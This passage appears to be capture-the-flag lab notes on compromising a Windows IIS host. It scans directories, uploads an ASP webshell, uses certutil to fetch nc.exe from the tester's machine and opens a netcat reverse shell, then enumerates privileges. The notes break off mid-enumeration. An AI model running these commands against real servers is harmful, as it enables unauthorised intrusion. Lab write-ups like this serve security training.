8 :80
http://10.10.10.116/
IIS 10.0 landing page
$ gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x aspx,asp,html,txt
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
http://10.10.10.116/upload/
# shows kashz.txt that we uploaded.
# .aspx => FAIL
| (Warning: Do not create a MIME map for content that users should not download, such as .ASPX pages or .config files.)
# usual .asp shells not working
Using https://github.com/tennc/webshell/blob/master/asp/webshell.asp
> works
# its a x64, using nc to get stable shell
http://10.10.10.116/upload/webshell.asp?cmd=certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
http://10.10.10.116/upload/webshell.asp?cmd=C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 6969
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.116] 49676
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
C:\Windows\SysWOW64\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
C:\Windows\SysWOW64\inetsrv>systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
System Type: x64-based PC
Hotfix(s): N/A
Last updated